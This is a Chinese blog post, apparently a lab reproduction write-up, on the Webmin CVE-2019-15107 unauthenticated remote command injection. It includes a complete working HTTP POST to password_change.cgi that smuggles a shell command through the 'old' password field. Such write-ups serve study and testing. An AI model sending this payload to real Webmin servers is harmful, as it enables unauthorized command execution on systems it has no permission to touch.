Webmin 远程命令执行漏洞


Webmin 远程命令执行漏洞(CVE-2019-15107)

Webmin 是一个用于管理类 Unix 系统的管理配置工具,具有 Web 页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。

参考链接:

https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
https://blog.firosolutions.com/exploits/webmin/

漏洞复现

忽略证书后即可看到webmin的登录页面

参考链接中的数据包是不对的,经过阅读代码可知,只有在发送的 user 参数的值不是已知 Linux 用户的情况下(而参考链接中是 user=root ),才会进入到修改 /etc/shadow 的地方,触发命令注入漏洞。

发送如下数据包,即可执行命令 id

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
Weblogic 常规渗透测试环境 Weblogic 常规渗透测试环境
Weblogic 常规渗透测试环境测试环境本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。 Weblogic版本:10.3.6(11g)
2019-03-01
下一篇 
Wordpress 4.6 任意命令执行漏洞 Wordpress 4.6 任意命令执行漏洞
Wordpress 4.6 任意命令执行漏洞原理参考 https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html 漏洞复现发送如下数据
2019-03-01
  目录